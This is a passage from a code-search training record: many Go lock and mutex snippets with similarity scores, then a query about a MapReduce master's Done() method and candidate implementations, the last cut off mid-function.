{\n\t\t_, err := h.updateSchedulerName(h.client, h.nameSpace, h.controllerName, h.scheduler)\n\t\treturn err\n\t})\n\n\treturn\n}", "func writersLock() {\n\tlog.Info(\"Acquiring lock\")\n\tmutex.Lock()\n\tlog.Info(\"Acquired\")\n}", "func (r *RedisDL) lock(ctx context.Context) error {\n\tr.m.Lock()\n\tdefer r.m.Unlock()\n\ttoken, err := randToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\tretry := time.NewTimer(r.opt.LockTimeout)\n\tatts := r.opt.RetryCount + 1\n\tfor {\n\t\tif err := r.storeToken(token); err == nil {\n\t\t\tr.currentToken = token\n\t\t\treturn nil\n\t\t}\n\t\tif atts--; atts <= 0 {\n\t\t\treturn fmt.Errorf(\"unable to generate token\")\n\t\t}\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\treturn ctx.Err()\n\t\tcase <-retry.C:\n\t\t}\n\t}\n}", "func event() {\n lock.Lock()\n defer lock.Unlock()\n if group != nil {\n group.Event()\n }\n}", "func (m *neighborEntryRWMutex) Lock() {\n\tlocking.AddGLock(neighborEntryprefixIndex, -1)\n\tm.mu.Lock()\n}", "func (g *Github) modLock() {\n\tg.modMutex.Lock()\n\tshouldWait := time.Second - time.Since(g.lastModRequest)\n\tif shouldWait > 0 {\n\t\tlog.Debugf(\"Waiting %s to not hit GitHub ratelimit\", shouldWait)\n\t\ttime.Sleep(shouldWait)\n\t}\n}", "func (vs *versionSet) logLock() {\n\t// Wait for any existing writing to the manifest to complete, then mark the\n\t// manifest as busy.\n\tfor vs.writing {\n\t\tvs.writerCond.Wait()\n\t}\n\tvs.writing = true\n}", "func (l *LockedOrca) getlock(key []byte, read bool) sync.Locker {\n\th := l.hpool.Get().(hash.Hash32)\n\th.Reset()\n\n\t// Calculate bucket using hash and mod. hash.Hash.Write() never returns an error.\n\th.Write(key)\n\tbucket := int(h.Sum32())\n\tbucket &= len(l.locks) - 1\n\n\t//atomic.AddUint32(&l.counts[bucket], 1)\n\n\t//if (atomic.AddUint64(&numops, 1) % 10000) == 0 {\n\t//\tfor idx, count := range l.counts {\n\t//\t\tfmt.Printf(\"%d: %d\\n\", idx, count)\n\t//\t}\n\t//}\n\n\tif read {\n\t\treturn l.rlocks[bucket]\n\t}\n\n\treturn l.locks[bucket]\n}", "func (cb *cachedBatch) Lock() {\n\tcb.lock.Lock()\n}", "func (cb *cachedBatch) Lock() {\n\tcb.lock.Lock()\n}", "func updateGPSReading( update GPSReading ) {\n rw_mutex.Lock()\n gpsReading = update\n rw_mutex.Unlock()\n}", "func (fdl *FDLimiter) Lock() {\n\tfor {\n\t\tfdl.lk.Lock()\n\t\tif fdl.count < fdl.limit {\n\t\t\tfdl.count++\n\t\t\tfdl.notify()\n\t\t\tfdl.lk.Unlock()\n\t\t\treturn\n\t\t}\n\t\tfdl.lk.Unlock()\n\t\t<-fdl.ch\n\t}\n\tpanic(\"FDLimiter, unreachable\")\n}", "func (n Node) readLock(fn func() error) error {\n\tn.fs.μ.RLock()\n\tdefer n.fs.μ.RUnlock()\n\treturn fn()\n}", "func Unlock() {\n\t// TO DO\n}", "func internalAcquire(fm *filemutex.FileMutex) chan error {\n\tresult := make(chan error)\n\tgo func() {\n\t\tif err := fm.Lock(); err != nil {\n\t\t\tresult <- err\n\t\t}\n\t\tclose(result)\n\t}()\n\treturn result\n}", "func (*dir) Lock(pid, locktype, flags int, start, length uint64, client string) error {\n\treturn nil\n}", "func (sic *indexCache) lockEntry(name addr) {\n\tsic.cond.L.Lock()\n\tdefer sic.cond.L.Unlock()\n\n\tfor {\n\t\tif _, present := sic.locked[name]; !present {\n\t\t\tsic.locked[name] = struct{}{}\n\t\t\tbreak\n\t\t}\n\t\tsic.cond.Wait()\n\t}\n}", "func (s *server) loader_task() {\n\tfor {\n\t\tkey := <-s.wait\n\t\ts.Lock()\n\t\ts.dirty[key] = true\n\t\ts.Unlock()\n\t}\n}", "func (s *SharedState) unlock() {\n s.mutex.Unlock()\n}", "func (b *baseKVStoreBatch) Lock() {\n\tb.mutex.Lock()\n}", "func (b *baseKVStoreBatch) Lock() {\n\tb.mutex.Lock()\n}", "func (this *DeployLock) finish() {\n\tthis.mutex.Lock()\n\tthis.numFinished++\n\tthis.mutex.Unlock()\n}", "func (r GopassRepo) lockState(payload []byte) error { return nil }", "func (sm *ShardMaster) update() {\n\tvar noop Op\n\tnoop.ProposedConfig.Num = 0\n\t// Concatenate first 16 digits of current time with\n\t// first 3 digits of sm.me\n\t// Using 3 digits of sm.me allows for a thousand peers\n\t// Using 16 digits of the time means it won't repeat for about 115 days\n\t// Using both time and \"me\" means it's probably unique\n\t// Using 19 digits means it will fit in a uint64\n\ttimeDigits := uint64(time.Now().UnixNano() % 10000000000000000)\n\tmeDigits := uint64(sm.me % 1000)\n\tnoop.ID = timeDigits*1000 + meDigits\n\n\tupdated := false\n\tfor !updated && !sm.dead {\n\t\tsm.px.Start(sm.maxSequenceCommitted+1, noop)\n\t\t// Wait until its Status is decided\n\t\tdecided := false\n\t\tvar decidedValue interface{}\n\t\ttoWait := 25 * time.Millisecond\n\t\tfor !decided && !sm.dead {\n\t\t\tdecided, decidedValue = sm.px.Status(sm.maxSequenceCommitted + 1)\n\t\t\tif !decided {\n\t\t\t\ttime.Sleep(toWait)\n\t\t\t\t//if toWait < 2*time.Second {\n\t\t\t\t//\ttoWait *= 2\n\t\t\t\t//}\n\t\t\t}\n\t\t}\n\n\t\tif sm.dead {\n\t\t\tbreak\n\t\t}\n\n\t\t// Get the decided configuration for this sequence\n\t\tdecidedConfig := decidedValue.(Op).ProposedConfig\n\t\t// If the decided value has the chosen unique ID, ours was accepted and we are updated\n\t\t// Otherwise, store decided configuration (if it's not another no-op)\n\t\tif decidedValue.(Op).ID == noop.ID {\n\t\t\tupdated = true\n\t\t} else {\n\t\t\tif decidedConfig.Num > 0 {\n\t\t\t\tsm.addConfig(decidedConfig)\n\t\t\t}\n\t\t}\n\t\tsm.maxSequenceCommitted++\n\t}\n\tsm.px.Done(sm.maxSequenceCommitted)\n}", "func (px *Paxos) Done(seq int) {\n // Your code here.\n px.mu.Lock()\n defer px.mu.Unlock()\n\n px.decisions[px.me] = seq\n}", "func (d *dMutex) lock(i interface{}) {\n\n\t// acquire global lock\n\td.globalMutex.Lock()\n\n\t// if there is no cMutex for i, create it\n\tif _, ok := d.mutexes[i]; !ok {\n\t\td.mutexes[i] = new(cMutex)\n\t}\n\n\t// increase the count in order to show, that we are interested in this\n\t// instance mutex (thus now one deletes it)\n\td.mutexes[i].count++\n\n\t// remember the mutex for later\n\tmutex := &d.mutexes[i].mutex\n\n\t// as the cMutex is there, we have increased the count, and we know the\n\t// instance mutex, we can release the global lock\n\td.globalMutex.Unlock()\n\n\t// and wait on the instance mutex\n\t(*mutex).Lock()\n}", "func (am *AccountManager) Grab() {\n\t<-am.bsem\n}", "func (fs *flowControlFlowStats) lockForTokens() {\n\tfs.shared.mu.Lock()\n}", "func (n Node) writeLock(fn func() error) error {\n\tn.fs.μ.Lock()\n\tdefer n.fs.μ.Unlock()\n\treturn fn()\n}", "func init() {\n\truntime.LockOSThread()\n}", "func init() {\n\truntime.LockOSThread()\n}", "func (m *Metric) Lock() {\n\tif m.mapSync == nil {\n\t\treturn\n\t}\n\tm.mapSync.Lock()\n}", "func (tm *TabletManager) lock(ctx context.Context) error {\n\treturn tm.actionSema.Acquire(ctx, 1)\n}", "func (self *Map) unlock() {\n\tif self.atomic != nil {\n\t\tself.atomic.Unlock()\n\t}\n}", "func gorAput() {\n\tfor n := range CA {\n\t\tif n == aToken {\n\t\t\tAB <- n\n\t\t\tfmt.Println(\"put to AB\")\n\t\t\tmutex.Lock()\n\t\t\tcount++\n\t\t\tmutex.Unlock()\n\t\t}\n\t}\n}", "func (p *Playlist) Lock() {\n\tlog.Debug(\"Locking playlist\")\n\tp.mu.Lock()\n}", "func (t *TrudyPipe) Lock() {\n\tt.userMutex.Lock()\n}", "func (e *Enumerate) unlock() {\n\te.u.m.Unlock()\n}", "func (wt *Wallet) Lock() {\n\twt.lockRequests <- struct{}{}\n}", "func Unlock() {\n\tmutex.Unlock()\n}", "func (p *PhonebookAccess1Properties) Lock() {\n\tp.lock.Lock()\n}", "func (m *MutexSafe) unlock() {\n\tm.Mutex.Unlock()\n}", "func (x *XcChaincode) lock(stub shim.ChaincodeStubInterface, args []string) pb.Response {\n\tif len(args) < 3 {\n\t\treturn shim.Error(\"Params Error\")\n\t}\n\t//get operator\n\tsender, err := stub.GetSender()\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t} else if sender == \"\" {\n\t\treturn shim.Error(\"Account not exist\")\n\t}\n\ttoPlatform := strings.ToLower(args[0])\n\ttoAccount := strings.ToLower(args[1])\n\tamount := big.NewInt(0)\n\t_, ok := amount.SetString(args[2], 10)\n\tif !ok {\n\t\treturn shim.Error(\"Expecting integer value for amount\")\n\t}\n\n\t//try to get state from book which key is variable toPlatform's value\n\tplatState, err := stub.GetState(toPlatform)\n\tif err != nil {\n\t\treturn shim.Error(\"Failed to get platform: \" + err.Error())\n\t} else if platState == nil {\n\t\treturn shim.Error(\"The platform named \" + toPlatform + \" is not registered\")\n\t}\n\n\t//set txId to be key\n\tkey := stub.GetTxID()\n\t//do transfer\n\terr = stub.Transfer(x.tacTokenAddr, \"TAB\", amount)\n\tif err != nil {\n\t\treturn shim.Error(\"Transfer error \" + err.Error())\n\t}\n\ttxTimestamp, err := stub.GetTxTimestamp()\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t}\n\ttimeStr := fmt.Sprintf(\"%d\", txTimestamp.GetSeconds())\n\t//build turn out state\n\tstate := x.buildTurnOutMessage(sender, toPlatform, toAccount, amount, timeStr)\n\terr = stub.PutState(key, state)\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t}\n\t//build composite key\n\tindexName := \"type~address~datetime~platform~key\"\n\tindexKey, err := stub.CreateCompositeKey(indexName, []string{\"out\", sender, timeStr, x.platName, key})\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t}\n\tvalue := []byte{0x00}\n\tstub.PutState(indexKey, value)\n\n\t//sign\n\tsignJson, err := x.signJson([]byte(\"abc\"), \"60320b8a71bc314404ef7d194ad8cac0bee1e331\")\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t}\n\treturn shim.Success(signJson)\n}", "func (svr *Server) update(){\n\tmsg := svr.queue.Dequeue()\n\tif msg != nil {\n\t\t// fmt.Println(\"server receives msg with vec_clock: \", msg.Vec)\n\t\t// fmt.Println(\"server has vec_clock: \", svr.vec_clock)\n\t\tsvr.vec_clock_cond.L.Lock()\n\t\tfor svr.vec_clock[msg.Id] != msg.Vec[msg.Id]-1 || !smallerEqualExceptI(msg.Vec, svr.vec_clock, msg.Id) {\n\t\t\tsvr.vec_clock_cond.Wait()\n\t\t\tif svr.vec_clock[msg.Id] > msg.Vec[msg.Id]-1 {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\t// update timestamp and write to local memory\n\t\tsvr.vec_clock[msg.Id] = msg.Vec[msg.Id]\n\t\t// fmt.Println(\"server increments vec_clock: \", svr.vec_clock)\n\t\tsvr.vec_clock_cond.Broadcast()\n\t\tsvr.vec_clock_cond.L.Unlock()\n\t\tsvr.m_data_lock.Lock()\n\t\tsvr.m_data[msg.Key] = msg.Val\n\t\tsvr.m_data_lock.Unlock()\n\t}\n}", "func (kv *ShardKV) tick() {\n kv.mu.Lock()\n defer kv.mu.Unlock()\n if kv.cur_config.Num!=kv.next_config.Num{\n return\n }\n query_num := kv.cur_config.Num+1\n config := kv.sm.Query(query_num)\n if config.Num == query_num {\n\n if val,ok := kv.config_started[config.Num];ok&&val{\n return\n }else{\n kv.config_started[config.Num] = true\n /*\n if kv.unreliable{\n fmt.Print(\"GID:\")\n fmt.Println(kv.gid)\n fmt.Print(\"me: \")\n fmt.Println(kv.me)\n fmt.Print(\"Config num: \")\n fmt.Println(config.Num)\n fmt.Println()\n }*/\n kv.Config(config)\n return\n }\n\n }\n return\n}", "func (r *ResourceLock) init() bool {\n\tif r.listing == nil {\n\t\tr.masterLock.Lock()\n\t\tdefer r.masterLock.Unlock()\n\t\t// double check, per pattern\n\t\tif r.listing == nil {\n\t\t\tr.listing = make(map[interface{}]*sync.Mutex)\n\t\t}\n\t\treturn true\n\t}\n\treturn false\n}", "func (ms *Server) returnRequest(req *request) {\n\tms.reqMu.Lock()\n\tthis := req.inflightIndex\n\tlast := len(ms.reqInflight) - 1\n\n\tif last != this {\n\t\tms.reqInflight[this] = ms.reqInflight[last]\n\t\tms.reqInflight[this].inflightIndex = this\n\t}\n\tms.reqInflight = ms.reqInflight[:last]\n\tinterrupted := req.interrupted\n\tms.reqMu.Unlock()\n\n\tms.recordStats(req)\n\tif interrupted {\n\t\t// Don't reposses data, because someone might still\n\t\t// be looking at it\n\t\treturn\n\t}\n\n\tif req.bufferPoolOutputBuf != nil {\n\t\tms.buffers.FreeBuffer(req.bufferPoolOutputBuf)\n\t\treq.bufferPoolOutputBuf = nil\n\t}\n\n\treq.clear()\n\n\tif p := req.bufferPoolInputBuf; p != nil {\n\t\treq.bufferPoolInputBuf = nil\n\t\tms.readPool.Put(p)\n\t}\n\tms.reqPool.Put(req)\n}", "func (w *Wallet) Lock() {\n\tw.lockRequests <- struct{}{}\n}", "func Unlock() {\n\tlock.Unlock()\n}", "func (p *AdminPolicyStatus1Properties) Lock() {\n\tp.lock.Lock()\n}", "func (self *AccelGroup) Lock() {\n\tC.gtk_accel_group_lock(self.object)\n}", "func (l *Lock) Lock() {\n\tl.ch <- struct{}{}\n}", "func (s *SharedState) lock() *SharedState {\n s.mutex.Lock()\n return s\n}", "func (n *nsLockMap) lock(ctx context.Context, volume, path string, lockSource, opsID string, readLock bool, timeout time.Duration) (locked bool) {\n\tvar nsLk *nsLock\n\n\tn.lockMapMutex.Lock()\n\tparam := nsParam{volume, path}\n\tnsLk, found := n.lockMap[param]\n\tif !found {\n\t\tn.lockMap[param] = &nsLock{\n\t\t\tLRWMutex: lsync.NewLRWMutex(ctx),\n\t\t\tref: 1,\n\t\t}\n\t\tnsLk = n.lockMap[param]\n\t} else {\n\t\t// Update ref count here to avoid multiple races.\n\t\tnsLk.ref++\n\t}\n\tn.lockMapMutex.Unlock()\n\n\t// Locking here will block (until timeout).\n\tif readLock {\n\t\tlocked = nsLk.GetRLock(opsID, lockSource, timeout)\n\t} else {\n\t\tlocked = nsLk.GetLock(opsID, lockSource, timeout)\n\t}\n\n\tif !locked { // We failed to get the lock\n\n\t\t// Decrement ref count since we failed to get the lock\n\t\tn.lockMapMutex.Lock()\n\t\tnsLk.ref--\n\t\tif nsLk.ref == 0 {\n\t\t\t// Remove from the map if there are no more references.\n\t\t\tdelete(n.lockMap, param)\n\t\t}\n\t\tn.lockMapMutex.Unlock()\n\t}\n\treturn\n}", "func (mdl *Model) Lock() {\n\tmdl.locked = true\n}", "func (f *fragment) handleMutex(rowID, columnID uint64) error {\n\tif existingRowID, found, err := f.mutexVector.Get(columnID); err != nil {\n\t\treturn errors.Wrap(err, \"getting mutex vector data\")\n\t} else if found && existingRowID != rowID {\n\t\tif _, err := f.unprotectedClearBit(existingRowID, columnID); err != nil {\n\t\t\treturn errors.Wrap(err, \"clearing mutex value\")\n\t\t}\n\t}\n\treturn nil\n}", "func main() {\n\tvar memoryAccess sync.Mutex //1\n\tvar value int\n\tgo func() {\n\t\tmemoryAccess.Lock() //2\n\t\tvalue++\n\t\tmemoryAccess.Unlock() //3\n\t}()\n\n\tmemoryAccess.Lock() //4\n\tif value == 0 {\n\t\tfmt.Printf(\"the value is %v\\n\", value)\n\t} else {\n\t\tfmt.Printf(\"the value is %v\\n\", value)\n\t}\n\tmemoryAccess.Unlock() //5\n}", "func (r *RecordCache) Lock() {\n\tr.lock.Lock()\n}", "func (f *file) Lock() error {\n\treturn nil\n}", "func acquire_distributed_write_lock(n *net_node.Node, filename string) {\n\t// If we are currently writing the file,\n\t// block until the write is finished\n\tif file_in_filesystem(n, filename) {\n\t\tfor n.Files[filename].Writing || n.Files[filename].NumReading > 0 {\n\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t}\n\t\tn.Files[filename].Writing = true\n\t\t//fmt.Println(filename + \" Set Writing to true | acquire_distributed_write_lock fileinsystem\")\n\t} else {\n\t\t//fmt.Println(filename + \" not in system, add to local list\")\n\t\tn.Files[filename] = &pings.FileMetaDataProto{Writing: true, FileSize: 0}\n\t\t//fmt.Println(filename + \" Set Writing to true | acquire_distributed_write_lock filenotinsystem\")\n\t}\n\n\t// Notify the servers that we are writing a file\n\t// so that other writes/reads will not be able to proceed\n\tnotify_other_servers_of_file_write_start(n, filename)\n\n\t// Wait for the other servers to respond\n\t// for int(n.Files[filename].NumAckWriting) < net_node.NumActiveServ(n)-1 {\n\t// \tfmt.Println(filename + \" got \" + strconv.Itoa(int(n.Files[filename].NumAckWriting)) + \" acks\")\n\t// \tfmt.Println(\"numberactive serv is \" + strconv.Itoa(net_node.NumActiveServ(n)))\n\t// \tfmt.Println(\"waiting for all ackwriting\")\n\t// \ttime.Sleep(100 * time.Millisecond)\n\t// }\n\n\tn.Files[filename].NumAckWriting = 0\n}", "func MWAIT() { ctx.MWAIT() }", "func (p Pin) Lock() {\n\tp.Port().Lock(Pin0 << p.index())\n}", "func (rw *RWMutex) AssertHeld() {\n}", "func (s *Scheduler) lockService() {\n\ts.serviceLock.Lock()\n}", "func (e *neighborEntry) dispatchAddEventLocked() {\n\tif nudDisp := e.cache.nic.stack.nudDisp; nudDisp != nil {\n\t\tnudDisp.OnNeighborAdded(e.cache.nic.id, e.mu.neigh)\n\t}\n}", "func (txs *TxSerializer) lockLocked(ctx context.Context, key, table string) (bool, error) {\n\tq, ok := txs.queues[key]\n\tif !ok {\n\t\t// First transaction in the queue i.e. we don't wait and return immediately.\n\t\ttxs.queues[key] = newQueueForFirstTransaction(txs.concurrentTransactions)\n\t\ttxs.globalSize++\n\t\treturn false, nil\n\t}\n\n\tif txs.globalSize >= txs.maxGlobalQueueSize {\n\t\tif txs.dryRun {\n\t\t\ttxs.globalQueueExceededDryRun.Add(1)\n\t\t\ttxs.logGlobalQueueExceededDryRun.Warningf(\"Would have rejected BeginExecute RPC because there are too many queued transactions (%d >= %d)\", txs.globalSize, txs.maxGlobalQueueSize)\n\t\t} else {\n\t\t\ttxs.globalQueueExceeded.Add(1)\n\t\t\treturn false, vterrors.Errorf(vtrpcpb.Code_RESOURCE_EXHAUSTED,\n\t\t\t\t\"hot row protection: too many queued transactions (%d >= %d)\", txs.globalSize, txs.maxGlobalQueueSize)\n\t\t}\n\t}\n\n\tif q.size >= txs.maxQueueSize {\n\t\tif txs.dryRun {\n\t\t\ttxs.queueExceededDryRun.Add(table, 1)\n\t\t\tif txs.env.Config().SanitizeLogMessages {\n\t\t\t\ttxs.logQueueExceededDryRun.Warningf(\"Would have rejected BeginExecute RPC because there are too many queued transactions (%d >= %d) for the same row (table + WHERE clause: '%v')\", q.size, txs.maxQueueSize, txs.sanitizeKey(key))\n\t\t\t} else {\n\t\t\t\ttxs.logQueueExceededDryRun.Warningf(\"Would have rejected BeginExecute RPC because there are too many queued transactions (%d >= %d) for the same row (table + WHERE clause: '%v')\", q.size, txs.maxQueueSize, key)\n\t\t\t}\n\t\t} else {\n\t\t\ttxs.queueExceeded.Add(table, 1)\n\t\t\tif txs.env.Config().TerseErrors {\n\t\t\t\treturn false, vterrors.Errorf(vtrpcpb.Code_RESOURCE_EXHAUSTED,\n\t\t\t\t\t\"hot row protection: too many queued transactions (%d >= %d) for the same row (table + WHERE clause: '%v')\", q.size, txs.maxQueueSize, txs.sanitizeKey(key))\n\t\t\t}\n\t\t\treturn false, vterrors.Errorf(vtrpcpb.Code_RESOURCE_EXHAUSTED,\n\t\t\t\t\"hot row protection: too many queued transactions (%d >= %d) for the same row (table + WHERE clause: '%v')\", q.size, txs.maxQueueSize, key)\n\t\t}\n\t}\n\n\tif q.availableSlots == nil {\n\t\t// Hot row detected: A second, concurrent transaction is seen for the\n\t\t// first time.\n\n\t\t// As an optimization, we deferred the creation of the channel until now.\n\t\tq.availableSlots = make(chan struct{}, txs.concurrentTransactions)\n\t\tq.availableSlots <- struct{}{}\n\n\t\t// Include first transaction in the count at /debug/hotrows. (It was not\n\t\t// recorded on purpose because it did not wait.)\n\t\ttxs.Record(key)\n\t}\n\n\ttxs.globalSize++\n\tq.size++\n\tq.count++\n\tif q.size > q.max {\n\t\tq.max = q.size\n\t}\n\t// Publish the number of waits at /debug/hotrows.\n\ttxs.Record(key)\n\n\tif txs.dryRun {\n\t\ttxs.waitsDryRun.Add(table, 1)\n\t\tif txs.env.Config().SanitizeLogMessages {\n\t\t\ttxs.logWaitsDryRun.Warningf(\"Would have queued BeginExecute RPC for row (range): '%v' because another transaction to the same range is already in progress.\", txs.sanitizeKey(key))\n\t\t} else {\n\t\t\ttxs.logWaitsDryRun.Warningf(\"Would have queued BeginExecute RPC for row (range): '%v' because another transaction to the same range is already in progress.\", key)\n\t\t}\n\t\treturn false, nil\n\t}\n\n\t// Unlock before the wait and relock before returning because our caller\n\t// Wait() holds the lock and assumes it still has it.\n\ttxs.mu.Unlock()\n\tdefer txs.mu.Lock()\n\n\t// Non-blocking write attempt to get a slot.\n\tselect {\n\tcase q.availableSlots <- struct{}{}:\n\t\t// Return waited=false because a slot was immediately available.\n\t\treturn false, nil\n\tdefault:\n\t}\n\n\t// Blocking wait for the next available slot.\n\ttxs.waits.Add(table, 1)\n\tselect {\n\tcase q.availableSlots <- struct{}{}:\n\t\treturn true, nil\n\tcase <-ctx.Done():\n\t\treturn true, ctx.Err()\n\t}\n}", "func (this *UserService) MatterLock(userUuid string) {\n\n\tcacheItem, err := this.locker.Value(userUuid)\n\tif err != nil {\n\t\tthis.logger.Error(\"error while get cache\" + err.Error())\n\t}\n\n\tif cacheItem != nil && cacheItem.Data() != nil {\n\t\tpanic(result.BadRequest(\"file is being operating, retry later\"))\n\t}\n\n\tduration := 12 * time.Hour\n\tthis.locker.Add(userUuid, duration, true)\n}", "func process() *os.Process {\n lock.Lock()\n defer lock.Unlock()\n return proc\n}", "func (l *fingerprintLocker) Lock(fp model.Fingerprint) {\n\tl.fpMtxs[hashFP(fp)%l.numFpMtxs].Lock()\n}", "func (ac *AuthCache) synchronize() {\n\t// if none of our internal reflectors changed, then we can skip reviewing the cache\n\tskip, currentState := ac.skip.SkipSynchronize(ac.lastState, ac.lastSyncResourceVersioner, ac.policyLastSyncResourceVersioner)\n\tif skip {\n\t\treturn\n\t}\n\n\tuserSubjectRecordStore := ac.userSubjectRecordStore\n\tgroupSubjectRecordStore := ac.groupSubjectRecordStore\n\n\tresources, err := ac.syncResources()\n\tif err != nil {\n\t\tutilruntime.HandleError(err)\n\t\treturn\n\t}\n\tac.knownResources = resources\n\tac.synchronizeClusterRoleBindings(userSubjectRecordStore, groupSubjectRecordStore)\n\tac.lastState = currentState\n\tklog.V(2).Infoln(\"synchronize...\", ac.knownResources, ac.knownUsers, ac.knownGroups)\n}", "func (c *CycleState) Lock() {\n\tc.mx.Lock()\n}", "func (marketApp *MarketPlaceApp) LockUse() error {\n return marketApp.Lock(1)\n}" ]
[ "0.64920616", "0.63997245", "0.63581294", "0.61224926", "0.60899276", "0.6075556", "0.6073647", "0.5971925", "0.59608155", "0.59295136", "0.5917507", "0.5889608", "0.5857709", "0.5783735", "0.56712055", "0.5640408", "0.5573369", "0.55703145", "0.5564623", "0.5563278", "0.556221", "0.55437195", "0.551109", "0.55027306", "0.55026424", "0.549801", "0.5488535", "0.5459987", "0.5456509", "0.5454719", "0.5450489", "0.54469323", "0.54089516", "0.5407317", "0.54028684", "0.5396941", "0.53849", "0.5379693", "0.5379693", "0.5377756", "0.5371933", "0.5371215", "0.53386986", "0.5325665", "0.5324903", "0.53200614", "0.5309173", "0.5302085", "0.5297017", "0.5297017", "0.5289926", "0.52882034", "0.52834934", "0.5278446", "0.5275266", "0.52748615", "0.5273747", "0.52566516", "0.5255697", "0.5255697", "0.52507955", "0.5249687", "0.52427036", "0.52404886", "0.5239985", "0.523701", "0.5236791", "0.52311885", "0.5229092", "0.522513", "0.52130175", "0.5210361", "0.52098966", "0.52081", "0.5204101", "0.52026594", "0.5199153", "0.51873434", "0.518493", "0.51845604", "0.51831627", "0.5182903", "0.51811373", "0.51726466", "0.5165319", "0.51514", "0.5141407", "0.51394147", "0.51232266", "0.5116063", "0.51093733", "0.51086223", "0.510324", "0.5102867", "0.5102859", "0.51018006", "0.50898224", "0.50808275", "0.5080065", "0.50730175", "0.5072338" ]
0.0
-1
main/mrmaster.go calls Done() periodically to find out if the entire job has finished.
func (m *Master) Done() bool { ret := false m.mu.Lock() defer m.mu.Unlock() ret = m.haveDone() return ret }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (m *Master) Done() bool {\n\tret := false\n\tfmt.Printf(\"MapTasks: %v\\n\", m.mapTasks)\n\tfmt.Printf(\"RedTasks: %v\\n\", m.reduceTasks)\n\tfmt.Printf(\"nReduce: %d, nMap: %d\\n\", m.nReduce, m.nMap)\n\t// Your code here.\n\t// all tasks have finished\n\tif m.hasGenerateReduceTasks && m.nReduce <= 0 && m.nMap <= 0 {\n\t\tret = true\n\t\tfmt.Println(\"The job has finished!\")\n\t}\n\treturn ret\n}", "func (m *Master) Done() bool {\n\t// Your code here.\n\treturn m.jobs.empty(ReduceJob)\n}", "func (m *Master) Done() bool {\n\tsuccNum := atomic.LoadInt64(&m.JobManager.SuccNum)\n\tif succNum == int64(m.Rnum) {\n\t\tclose(m.JobManager.Jobs) // 安全关闭\n\t\tclose(m.JobManager.RShuffleChan)\n\t\treturn true\n\t}\n\treturn false\n}", "func (m *Master) Done() bool {\n\t// Your code here.\n\tm.mu.Lock()\n\tdefer m.mu.Unlock()\n\n\tnum_active_client := len(m.clients)\n\tfmt.Println(\"Active clients: \" + strconv.Itoa(num_active_client))\n\n\tdone := true\n\tfor job, job_status := range m.jobs {\n\t\tfmt.Println(job + \": \" + job_status)\n\t\tif job_status != \"done\" {\n\t\t\tdone = false\n\t\t}\n\t}\n\treturn done\n}", "func (m *Master) Done() bool {\n\tret := false\n\tfor _, worker := range m.WorkerMap {\n\t\t// ping to worker\n\t\t_, err := rpc.DialHTTP(\"tcp\", worker.Host + fmt.Sprintf(\":%d\", worker.Port))\n\t\tif err != nil {\n\t\t\tm.mu.Lock()\n\t\t\tdelete(m.WorkerMap, worker.ID)\n\t\t\tm.mu.Unlock()\n\n\t\t\tlog.Printf(\"worker %s died!\\n\", worker.ID)\n\t\t\tlog.Println(\"re-assign task to other worker\")\n\t\t\tif m.NumMapperCompleted < len (m.MapperTask) {\n\t\t\t\tfor _, mTask := range m.MapperTask {\n\t\t\t\t\tif mTask.WorkerID == worker.ID {\n\t\t\t\t\t\tmTask.Status = Idle\n\t\t\t\t\t\tm.mu.Lock()\n\t\t\t\t\t\tm.MapperTask[mTask.ID] = mTask\n\t\t\t\t\t\tm.mu.Unlock()\n\t\t\t\t\t\tlog.Println(\"mapper task hold by worker has released. Task ID: \", mTask.ID)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tif m.NumReduceCompleted < len (m.ReducerTask) {\n\t\t\t\tfor _, rTask := range m.ReducerTask {\n\t\t\t\t\tif rTask.WorkerID == worker.ID {\n\t\t\t\t\t\trTask.Status = Idle\n\t\t\t\t\t\tm.mu.Lock()\n\t\t\t\t\t\tm.ReducerTask[int(rTask.ID)] = rTask\n\t\t\t\t\t\tm.mu.Unlock()\n\t\t\t\t\t\tlog.Println(\"reducer task hold by worker has released. Task ID: \", rTask.ID)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Printf(\"worker %s is running \\n\", worker.ID)\n\t\t}\n\t}\n\t// tasks completed\n\tif m.NumReduceCompleted == m.NReduce {\n\t\tret = true\n\t}\n\treturn ret\n}", "func (m *Master) Done() bool {\r\n\tret := false\r\n\r\n\t// Your code here.\r\n\t// wg.Wait()\r\n\r\n\tret = <-m.done\r\n\r\n\tm.mux.Lock()\r\n\tif len(m.failedReduceFinish) != 0 {\r\n\t\t// log.Printf(\"Crashed Workers: %v\\n\", m.failedReduceFinish)\r\n\t\tfor _, taskNo := range m.failedReduceFinish {\r\n\t\t\tfilename := \"mr-out-\" + strconv.Itoa(taskNo)\r\n\t\t\terr := os.Remove(filename)\r\n\t\t\tif err != nil {\r\n\t\t\t\t// log.Println(\"Delete file failed: \", filename)\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tm.mux.Unlock()\r\n\r\n\treturn ret\r\n}", "func (m *Master) Done() bool {\n\t// Re-issue map tasks if the master waits for more than ten seconds.\n\tfor i, v := range m.mapStates {\n\t\tif v.state == 0 {\n\t\t\treturn false\n\t\t}\n\t\tif v.state == 1 {\n\t\t\telapsed := time.Since(v.t)\n\t\t\tif elapsed > time.Second*10 {\n\t\t\t\tm.mapStates[i].state = 0\n\t\t\t}\n\t\t\treturn false\n\t\t}\n\t}\n\t// Re-issue reduce tasks if the master waits for more than ten seconds.\n\tfor i, v := range m.reduceStates {\n\t\tif v.state == 0 {\n\t\t\treturn false\n\t\t}\n\t\tif v.state == 1 {\n\t\t\telapsed := time.Since(v.t)\n\t\t\tif elapsed > time.Second*10 {\n\t\t\t\tm.reduceStates[i].state = 0\n\t\t\t}\n\t\t\treturn false\n\t\t}\n\t}\n\t// All map and reduce tasks are finished.\n\treturn true\n}", "func (m *Master) Done() bool {\n\tret := false\n\n\t// Your code 